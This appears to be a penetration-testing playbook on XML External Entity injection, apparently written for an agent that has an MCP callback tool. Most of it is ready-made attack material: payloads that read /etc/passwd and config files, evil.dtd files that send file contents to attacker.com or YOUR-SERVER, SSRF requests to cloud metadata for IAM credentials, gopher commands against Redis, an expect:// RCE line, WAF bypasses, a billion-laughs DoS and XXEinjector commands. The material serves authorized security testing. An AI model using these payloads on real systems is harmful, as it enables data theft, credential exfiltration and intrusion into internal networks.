CWE: CWE-611
WSTG: WSTG-INPV-07
MITRE ATT&CK: T1190
CVSS Range: 4.3-9.1
Tools: xxeinjector
Difficulty: 🟡 intermediate

XML External Entity (XXE)

XXE injection targets applications that parse XML input, exploiting the XML specification's support for external entities to reference resources the server should not expose. Impact ranges from local file disclosure and SSRF to denial of service, and in rare configurations, remote code execution.

Quick Reference​

Detection priority order:

  1. Identify all XML-accepting endpoints (check Content-Type headers, SOAP/WSDL services, file upload points)
  2. Confirm entity processing with a safe internal entity test
  3. Test external entity access with an OOB callback (DNS/HTTP)
  4. Escalate to file read, SSRF, or blind exfiltration

Content-Types that signal XML parsing:

| Content-Type | Context |
| --- | --- |
| application/xml | Generic XML API |
| text/xml | Legacy XML API |
| application/soap+xml | SOAP services |
| application/xhtml+xml | XHTML documents |
| image/svg+xml | SVG image processing |
| application/rss+xml | RSS feed import |
| application/atom+xml | Atom feed import |
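
The Content-Type check above can be automated when triaging captured traffic. The following is a minimal sketch, not part of any tool named in this document: the function name `signals_xml` is hypothetical, and treating every `+xml` suffix as XML is an assumption that generalizes the rows in the table.

```python
# Media types that signal XML parsing, plus the generic "+xml" suffix rule.
XML_MEDIA_TYPES = {"application/xml", "text/xml"}


def signals_xml(content_type: str) -> bool:
    """Return True if a Content-Type header value suggests XML parsing."""
    # Drop parameters such as "; charset=UTF-8" and normalise case.
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type in XML_MEDIA_TYPES or media_type.endswith("+xml")


if __name__ == "__main__":
    for value in ("application/soap+xml; charset=utf-8", "image/svg+xml", "application/json"):
        print(value, "->", signals_xml(value))
```

A header that does not match is not proof that XML is rejected; the Content-Type switch test later in this document still applies.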

Request patterns to look for:

  • POST /api/import with XML body
  • File uploads accepting .xml, .svg, .docx, .xlsx
  • SOAP endpoints at /ws/, /soap/, /service/
  • Webhook endpoints accepting text/xml
  • SAML/SSO endpoints processing XML assertions

Parser defaults by language:

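| Language | Parser | External Entities Default |
| --- | --- | --- |
| Java | SAXParser, DocumentBuilder, XMLReader | Enabled |
| PHP (<8.0) | libxml2 with LIBXML_NOENT | Enabled |
| PHP (8.0+) | libxml2 | Disabled unless LIBXML_NOENT is passed |
| Python | lxml (<5.0) | Enabled for local files (resolve_entities=True); network fetches blocked by default |
| Python | lxml (5.0+), xml.etree | Disabled |
| Python | xml.sax | Disabled since Python 3.7.1; enabled in earlier versions |
| .NET (<4.5.2) | XmlDocument, XmlTextReader | Enabled |
| .NET (4.5.2+) | XmlDocument | Disabled |
| Node.js | xml2js, fast-xml-parser | Disabled |
| Ruby | Nokogiri | Disabled |
| Ruby | REXML | May be enabled |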
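
Defaults like these are easy to verify locally before relying on them. As a minimal sketch, the snippet below checks how the Python standard library's `xml.etree.ElementTree` handles an external entity reference. The function name and the probe path `/nonexistent-xxe-probe` are hypothetical; the check relies on the documented behavior that ElementTree raises `ParseError` instead of resolving the entity.

```python
import xml.etree.ElementTree as ET

# A document that declares and references an external entity.
# The path is a harmless placeholder and is never opened by ElementTree.
EXTERNAL_ENTITY_DOC = (
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///nonexistent-xxe-probe">]>'
    "<root>&xxe;</root>"
)


def etree_rejects_external_entities() -> bool:
    """Return True if ElementTree refuses to expand the external entity."""
    try:
        ET.fromstring(EXTERNAL_ENTITY_DOC)
    except ET.ParseError:
        # ElementTree reports the reference as an undefined entity.
        return True
    return False


if __name__ == "__main__":
    print("external entities rejected:", etree_rejects_external_entities())
```

The same pattern (parse a probe document, observe whether it errors or expands) can be repeated against any parser in the table to confirm the behavior of the exact version in use.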

Read Local Files (Classic XXE)​

Start with baseline validation. Confirm the endpoint parses XML and processes entities before attempting file reads.

Step 1: Confirm XML parsing​

curl -X POST "https://TARGET/api/endpoint" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><root><item>test</item></root>'

Note the response format, status code, and any processing indicators.

Step 2: Confirm internal entity processing​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY test "ENTITY_PROCESSED">
]>
<root><item>&test;</item></root>

If the response contains ENTITY_PROCESSED, the parser expands entities. Proceed to external entities.
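
The marker check in Step 2 can be sketched as follows. This is an illustrative helper under stated assumptions: `marker_reflected` is a hypothetical name, and the local parse with `xml.etree.ElementTree` only demonstrates what an entity-expanding parser returns for the probe; it says nothing about the target.

```python
import xml.etree.ElementTree as ET

MARKER = "ENTITY_PROCESSED"

# The Step 2 probe: an internal entity whose value is the marker string.
PROBE = (
    '<?xml version="1.0"?>'
    f'<!DOCTYPE foo [<!ENTITY test "{MARKER}">]>'
    "<root><item>&test;</item></root>"
)


def marker_reflected(response_body: str) -> bool:
    """True if the response shows the expanded marker rather than the raw reference."""
    return MARKER in response_body and "&test;" not in response_body


# Local sanity check: a parser that expands internal entities yields the marker.
item = ET.fromstring(PROBE).find("item")
print(item.text)
```

Pass the HTTP response body from the Step 2 request to `marker_reflected` to decide whether to proceed to external entities.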

Step 3: Read local files​

Linux targets:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

Windows targets:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root>&xxe;</root>

Step 4: Read application-specific files​

Target configuration files for credential extraction:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
]>
<root>&xxe;</root>

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/inetpub/wwwroot/web.config">
]>
<root>&xxe;</root>

If the file contains characters that break XML parsing (angle brackets, ampersands), use the PHP base64 filter described under Protocol alternatives or the CDATA wrapping technique described under Abuse Parameter Entities.

Exfiltrate Data Blind (OOB)​

When the response does not reflect entity content, use out-of-band channels to exfiltrate data.

External DTD method​

Step 1: Host a malicious DTD on your server (evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%eval;
%exfil;

Step 2: Send the payload that loads the external DTD:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://YOUR-SERVER/evil.dtd">
%xxe;
]>
<root>test</root>

Monitor your server logs for the incoming request containing the file contents as a query parameter.

FTP exfiltration (multi-line files)​

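HTTP exfiltration usually fails or truncates on multi-line files because the contents are placed in a URL, where raw newlines are invalid. FTP tolerates this on some parsers (notably older Java versions), so use it for multi-line file contents.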

Host this evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'ftp://YOUR-FTP-SERVER/%file;'>">
%eval;
%exfil;

Run an FTP listener on your server to capture the full file contents across multiple lines.

Base64 exfiltration (PHP targets)​

When file contents contain special characters that break the exfiltration URL:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
%eval;
%exfil;
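
Once the callback arrives, the base64 value has to be recovered from the logged request line. The sketch below assumes the `data` query parameter used in the DTD above; the function name `decode_exfil` is hypothetical. It restores `+` characters, which query-string parsing turns into spaces, and repairs missing padding.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_target: str, param: str = "data") -> str:
    """Decode a base64-encoded file from a logged request target such as '/?data=...'."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    if not values:
        raise ValueError(f"parameter {param!r} not found in {request_target!r}")
    # parse_qs decodes '+' as a space; base64 needs the '+' back.
    encoded = values[0].replace(" ", "+")
    # Some parsers drop trailing '=' padding; restore it to a multiple of four.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


if __name__ == "__main__":
    sample = base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
    print(decode_exfil("/?data=" + sample), end="")
```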

Monitor for callbacks​

After injecting the entity, poll for captured requests:

result = mcp__pter-api-server__manage_ssrf_callbacks(action="check", token=token)
# result["received"] == True means the target resolved and fetched the entity URL

Reach Internal Services (XXE to SSRF)​

Use XXE to reach internal services, cloud metadata endpoints, and private network resources.

Cloud metadata services​

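AWS (IMDSv1 only; IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot issue):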

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>

After retrieving the IAM role name, fetch credentials with a second request:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME">

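GCP (the v1 endpoint requires a Metadata-Flavor: Google request header, which an entity fetch cannot set, so expect this to fail on current deployments):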

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<root>&xxe;</root>

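Azure (IMDS requires a Metadata: true request header, which an entity fetch cannot set, so expect this to fail in most cases):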

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance?api-version=2021-02-01">
]>
<root>&xxe;</root>

Internal service access​

Probe internal services for further exploitation:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">
]>
<root>&xxe;</root>

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-api.local:8080/status">
]>
<root>&xxe;</root>

Use XXE SSRF to enumerate internal services and ports, then chain with vulnerabilities in those internal applications.

Gopher protocol (if supported)​

Interact with internal services using raw TCP via gopher:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "gopher://internal-server:6379/_SET%20key%20value">
]>
<root>&xxe;</root>

This can target Redis, Memcached, and other services that accept plaintext commands.

Abuse Parameter Entities​

Parameter entities (%) are processed within the DTD itself. They are your primary tool when general entities (&) are blocked.

Basic parameter entity attack​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>&exfil;</root>

Where evil.dtd contains:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?d=%data;'>">
%param1;

CDATA wrapping for in-band retrieval​

Use parameter entities to wrap file contents in CDATA so special characters do not break parsing:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://attacker.com/cdata.dtd">
%dtd;
]>
<root>&all;</root>

cdata.dtd:

<!ENTITY all "%start;%file;%end;">

This technique requires the parser to allow both external DTD loading and general entity expansion.

Exploit Local and Embedded DTDs​

Local DTD exploitation​

When external DTD loading is blocked but local file access is allowed, abuse DTD files already present on the system. You redefine a parameter entity from a local DTD to inject your payload.

Common local DTD locations:

Linux:

/usr/share/xml/fontconfig/fonts.dtd
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/sgml/docbook/xml-dtd-4.1.2/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd

Windows:

C:/Windows/System32/wbem/xml/cim20.dtd
C:/Windows/System32/wbem/xml/wmi20.dtd

Exploitation using fonts.dtd (common on Linux):

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<foo>test</foo>

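The technique works by:

  1. Declaring your own version of a parameter entity that the local DTD also defines (e.g., %expr), with the payload as its value
  2. Loading the local DTD; because the first declaration of an entity wins, the DTD's own definition of that entity is ignored
  3. Expanding %local_dtd, at which point the DTD references the overridden entity and the embedded payload is parsed, triggering the file read or exfiltration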

Generic template -- adapt to any local DTD with a known entity name X:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///path/to/local.dtd">
<!ENTITY % X 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; exfil SYSTEM &#x27;http://YOUR-SERVER/?d=&#x25;file;&#x27;>">
&#x25;eval;
&#x25;exfil;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<foo>test</foo>

XXE via file formats (SVG, DOCX, XLSX)​

SVG files:

Many applications process SVG server-side for resizing or conversion. Create xxe.svg:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
<text x="10" y="20">&xxe;</text>
</svg>

Upload and check if file contents appear in the rendered image or error messages.

DOCX files (Office Open XML):

Office documents are ZIP archives containing XML files.

  1. Extract a legitimate DOCX: unzip legitimate.docx -d docx_contents/
  2. Inject entity into word/document.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE document [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p><w:r><w:t>&xxe;</w:t></w:r></w:p>
</w:body>
</w:document>
  3. Repackage: cd docx_contents && zip -r ../malicious.docx * && cd ..
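
Where the `zip` command is unavailable, the repackaging step can be sketched with Python's standard `zipfile` module. The function name `repackage_docx` is hypothetical, and the output path is assumed to live outside the extracted directory so the archive does not include itself. Unlike a shell glob, this walk also picks up dotfiles such as `_rels/.rels`.

```python
import zipfile
from pathlib import Path


def repackage_docx(source_dir: str, output_path: str) -> list[str]:
    """Zip every file under source_dir into output_path, preserving relative paths."""
    root = Path(source_dir)
    names = []
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as archive:
        for path in sorted(root.rglob("*")):
            if path.is_file():
                # Archive member names must be relative and use forward slashes.
                arcname = path.relative_to(root).as_posix()
                archive.write(path, arcname)
                names.append(arcname)
    return names


if __name__ == "__main__":
    import sys

    if len(sys.argv) == 3:
        print("\n".join(repackage_docx(sys.argv[1], sys.argv[2])))
```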

XLSX files:

Inject into xl/worksheets/sheet1.xml or xl/sharedStrings.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE worksheet [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData>
<row>
<c t="inlineStr"><is><t>&xxe;</t></is></c>
</row>
</sheetData>
</worksheet>

XXE in SOAP requests​

SOAP services are prime XXE targets:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetUser>
<username>&xxe;</username>
</GetUser>
</soap:Body>
</soap:Envelope>

XXE in RSS/Atom feeds​

If the application imports external feeds:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<rss version="2.0">
<channel>
<title>&xxe;</title>
<link>http://example.com</link>
<description>Test</description>
</channel>
</rss>

SAML-specific XXE​

SAML responses are XML documents and may be vulnerable:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">&xxe;</saml:Issuer>
</samlp:Response>

Extract Data via Error Messages​

Extract data through parser error messages when both in-band reflection and outbound connections are blocked.

Basic error-based extraction​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
<root>test</root>

This triggers an error like: File not found: /nonexistent/root:x:0:0:root:/root:/bin/bash... -- the file contents appear in the error message.

Java-specific error-based XXE​

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'jar:file:///nonexistent!/%file;'>">
%eval;
%error;
]>
<root>test</root>

Switch Content-Type to XML​

Many endpoints that accept JSON also accept XML when you change the Content-Type header. Always test this.

Original JSON request:

curl -X POST "https://TARGET/api/data" \
-H "Content-Type: application/json" \
-d '{"name": "test"}'

Switch to XML:

curl -X POST "https://TARGET/api/data" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><name>&xxe;</name></root>'

Map the JSON field names to XML element names. If the endpoint processes the XML, you have an XXE attack surface that was invisible from the normal API documentation.
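
Mapping JSON fields to XML elements can be sketched as below. This is one plausible mapping, not a standard: the function name `json_to_xml`, the default `root` wrapper, and the `item` tag for list entries are all assumptions, and the target framework may expect different element names.

```python
import xml.etree.ElementTree as ET


def json_to_xml(payload: dict, root_tag: str = "root") -> str:
    """Convert a JSON-style dict into an XML string, one element per key."""

    def build(parent: ET.Element, value) -> None:
        if isinstance(value, dict):
            for key, child in value.items():
                build(ET.SubElement(parent, str(key)), child)
        elif isinstance(value, list):
            # Assumed convention: each list entry becomes an <item> element.
            for entry in value:
                build(ET.SubElement(parent, "item"), entry)
        elif value is not None:
            parent.text = str(value)

    root = ET.Element(root_tag)
    build(root, payload)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print(json_to_xml({"name": "test"}))  # <root><name>test</name></root>
```

Send the converted body first without any DOCTYPE to learn whether the endpoint parses XML at all, then add the entity declaration.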

Also test these Content-Type variations:

  • text/xml
  • application/xml;charset=UTF-8
  • application/xhtml+xml

Bypass Filters and WAFs​

WAF evasion techniques​

XML character references (parser-dependent):

<!ENTITY xxe SYSTEM "file:&#x2f;&#x2f;&#x2f;etc/passwd">

Parameter entity construction (split the protocol handler):

<!ENTITY % p1 "fi">
<!ENTITY % p2 "le:">
<!ENTITY % p3 "///etc/passwd">
<!ENTITY % full "%p1;%p2;%p3;">

UTF-16 encoding:

<?xml version="1.0" encoding="UTF-16"?>

Convert the entire payload to UTF-16 to bypass WAF rules that only inspect UTF-8.
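
The conversion itself is a one-line re-encode. The sketch below assumes the payload starts with the plain `<?xml version="1.0"?>` declaration used throughout this document; the function name `to_utf16` is hypothetical. Python's `utf-16` codec prepends a byte order mark in the platform's native byte order.

```python
import codecs


def to_utf16(payload: str) -> bytes:
    """Declare UTF-16 in the XML prolog and encode the whole document accordingly."""
    declared = payload.replace(
        '<?xml version="1.0"?>',
        '<?xml version="1.0" encoding="UTF-16"?>',
        1,
    )
    # The "utf-16" codec emits a BOM followed by native-endian code units.
    return declared.encode("utf-16")


if __name__ == "__main__":
    body = to_utf16('<?xml version="1.0"?><root>test</root>')
    print(body[:2] == codecs.BOM_UTF16, len(body))
```

Send the resulting bytes as the raw request body, and consider adding `charset=UTF-16` to the Content-Type header so the declared and actual encodings agree.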

Incomplete remediation bypasses​

When testing a parser that has been partially hardened, try these bypasses:

| Incomplete Fix | Bypass |
| --- | --- |
| Only blocks SYSTEM keyword | Use PUBLIC entities instead |
| Only blocks http:// protocol | Try file://, netdoc://, jar:, gopher:// |
| Only checks DOCTYPE at document start | Nested XML in CDATA, XML in headers |
| Blocks external DTD but not parameter entities | Inline parameter entity tricks |
| Input validation on specific fields only | Find unvalidated XML input points |
| Blocks general entities | Parameter entities may still work |

Protocol alternatives​

Java netdoc protocol (alternative to file://):

<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">

Java jar protocol (triggers SSRF during JAR download):

<!ENTITY xxe SYSTEM "jar:http://attacker.com/payload.jar!/file.txt">

PHP expect wrapper (RCE if expect extension is loaded):

<!ENTITY xxe SYSTEM "expect://id">

PHP filter chains (base64 encode to handle binary/special characters):

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

Billion Laughs (Entity Expansion DoS)​

Only use this for denial-of-service testing with explicit authorization.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

This expands to 10^8 (100 million) copies of "lol", about 300 MB of raw text and typically far more once held in parser memory. Confirm explicit DoS testing authorization before sending this payload.
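
The expansion size follows from simple arithmetic: each nesting level multiplies the count by the number of references it contains. A minimal sketch for the payload as written, where lol2 through lol9 are eight levels of tenfold nesting (the function name is hypothetical):

```python
def expanded_copies(levels: int, fan_out: int = 10) -> int:
    """Copies of the base string after `levels` rounds of fan_out-fold nesting."""
    return fan_out ** levels


LEVELS = 8  # lol2 through lol9 each reference the previous entity ten times
copies = expanded_copies(LEVELS)
raw_bytes = copies * len("lol")

print(f"{copies:,} copies, {raw_bytes / 1e6:.0f} MB of raw text")
# prints: 100,000,000 copies, 300 MB of raw text
```

Adding one more level (a lol10 entity) multiplies both figures by ten, which is why parsers cap entity expansion depth or total expanded size.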

Build a Proof of Concept​

When building proof-of-concept demonstrations:

  1. Start safe. Use OOB detection (manage_ssrf_callbacks MCP tool) before attempting file reads. Confirm entity processing with an internal entity before escalating.

  2. Read non-sensitive files first. Demonstrate with /etc/passwd (Linux) or c:/windows/win.ini (Windows) -- files that prove access without exposing real secrets.

  3. Document the full chain. Record:

    • The exact endpoint URL and HTTP method
    • Request headers (especially Content-Type)
    • The payload sent
    • The response or OOB callback proving exploitation
    • The parser behavior observed (which entity types work, which protocols are accessible)
  4. For blind XXE, capture:

    • The manage_ssrf_callbacks interaction showing the callback (use action="get_requests")
    • The DTD file hosted on your server
    • The exfiltrated data received at your server
  5. For file upload XXE, document:

    • The original file format (SVG, DOCX, XLSX)
    • Which XML file inside the archive was modified
    • How the application processes the uploaded file (preview, import, conversion)
  6. Demonstrate real impact. After confirming basic file read, escalate to reading application configuration files, cloud metadata, or internal service responses to demonstrate business impact.
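
The items to record in step 3 map naturally onto a small structured record. The following is a sketch only: the class name `XxeEvidence` and its field names are hypothetical and simply mirror the checklist above.

```python
import json
from dataclasses import asdict, dataclass, field


@dataclass
class XxeEvidence:
    """One proof-of-concept record, mirroring the documentation checklist."""

    endpoint: str                 # exact endpoint URL
    method: str                   # HTTP method
    headers: dict                 # request headers, especially Content-Type
    payload: str                  # the payload sent
    proof: str                    # response excerpt or OOB callback details
    parser_notes: list = field(default_factory=list)  # observed parser behavior

    def to_json(self) -> str:
        return json.dumps(asdict(self), indent=2)


if __name__ == "__main__":
    record = XxeEvidence(
        endpoint="https://TARGET/api/parse",
        method="POST",
        headers={"Content-Type": "application/xml"},
        payload="<!-- payload as sent -->",
        proof="<!-- response or callback -->",
        parser_notes=["internal entities expanded"],
    )
    print(record.to_json())
```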

Tools​

manage_ssrf_callbacks (MCP tool): Use the built-in callback service to detect blind XXE via HTTP callbacks. Self-hosted, private, and integrated with the platform.

# Create a callback for OOB XXE detection
result = mcp__pter-api-server__manage_ssrf_callbacks(action="create")

Send a payload that references the returned callback URL:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://CALLBACK_URL/xxe_test">
]>
<root>&xxe;</root>

# Check for callbacks
mcp__pter-api-server__manage_ssrf_callbacks(action="check", token=result["token"])
mcp__pter-api-server__manage_ssrf_callbacks(action="get_requests", token=result["token"])

XXEinjector:

Automates XXE exploitation including blind OOB techniques.

# --file is a saved raw HTTP request with XXEINJECT marking the injection point;
# --path is the remote path to retrieve or enumerate; --host is your listener address.

# File read with HTTP OOB
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd \
--file=request.txt --oob=http

# HTTPS target
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd \
--file=request.txt --ssl

# PHP filter encoding
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd \
--file=request.txt --oob=http --phpfilter

# With proxy (route through Burp)
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd \
--file=request.txt --proxy=127.0.0.1:8080

# Try multiple files (one path per line in filenames.txt)
ruby XXEinjector.rb --host=attacker.com --brute=filenames.txt \
--file=request.txt --oob=http

Manual curl testing:

# Save payload to file for clean testing
cat > xxe_payload.xml << 'EOF'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
EOF

curl -X POST "https://TARGET/api/parse" \
-H "Content-Type: application/xml" \
--data-binary @xxe_payload.xml

DTD hosting for blind XXE:

Host your malicious DTD on a server you control. A simple Python HTTP server works:

# On your server
python3 -m http.server 8080
# Place evil.dtd in the serving directory

Ensure your server is reachable from the target. If the target has egress filtering, try DNS exfiltration or error-based techniques instead.

Prioritization​

Test these first (highest real-world exploitability)​

  1. XXE on SOAP/XML API endpoints -- EPSS >0.6 for XXE CVEs. SOAP services and XML-RPC endpoints are the most common XXE vectors. Inject a basic external entity referencing /etc/passwd or an OOB callback.
  2. XXE via file upload (DOCX, XLSX, SVG) -- Office documents and SVG files are XML-based. Upload a crafted file with an external entity definition. Many document processing libraries parse XML without disabling external entities.
  3. XXE on Content-Type switch -- Send XML to endpoints that normally accept JSON by changing Content-Type: application/json to Content-Type: application/xml. Many frameworks auto-detect and parse XML.

Test these if time permits (lower exploitability)​

  1. Blind XXE with OOB exfiltration -- When the response does not reflect entity content, use DNS or HTTP callbacks to confirm XXE, then exfiltrate file contents through an external DTD and parameter entities.
  2. XXE to SSRF chaining -- Use confirmed XXE to reach internal services (cloud metadata, Redis, etc.) via http:// entities. Same targets as SSRF but through XML parsing.
  3. Billion laughs / entity expansion DoS -- Demonstrate DoS impact with nested entity definitions. Low exploitation value but useful for impact assessment.

Skip if​

  • Application does not accept XML input in any form (no XML APIs, no XML-based file uploads, no SOAP services)
  • Application only accepts JSON with strict Content-Type validation (returns 415 for application/xml)

Note: You cannot externally verify parser configuration. Always test for XXE if the application accepts XML in any form — parser hardening must be confirmed through testing, not assumed.

Asset criticality​

Prioritize by data exposure: endpoints processing user-uploaded documents (DOCX, XLSX) > SOAP/XML-RPC APIs > configuration import features > RSS/feed processing endpoints. XXE on endpoints with access to sensitive files or internal networks is higher priority.
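
The ordering above can be applied mechanically to an endpoint inventory. This is a minimal sketch: the category labels and the `kind` key are hypothetical names chosen to mirror the four classes listed, and unknown categories are placed last.

```python
# Categories in descending priority, mirroring the ordering in the text.
PRIORITY = ("document_upload", "soap_xmlrpc", "config_import", "feed_processing")


def rank_endpoints(endpoints: list[dict]) -> list[dict]:
    """Sort endpoint records by data-exposure priority; unknown kinds go last."""
    order = {kind: index for index, kind in enumerate(PRIORITY)}
    return sorted(endpoints, key=lambda entry: order.get(entry["kind"], len(PRIORITY)))


if __name__ == "__main__":
    inventory = [
        {"path": "/feeds/import", "kind": "feed_processing"},
        {"path": "/ws/orders", "kind": "soap_xmlrpc"},
        {"path": "/upload/docx", "kind": "document_upload"},
    ]
    for entry in rank_endpoints(inventory):
        print(entry["path"])
```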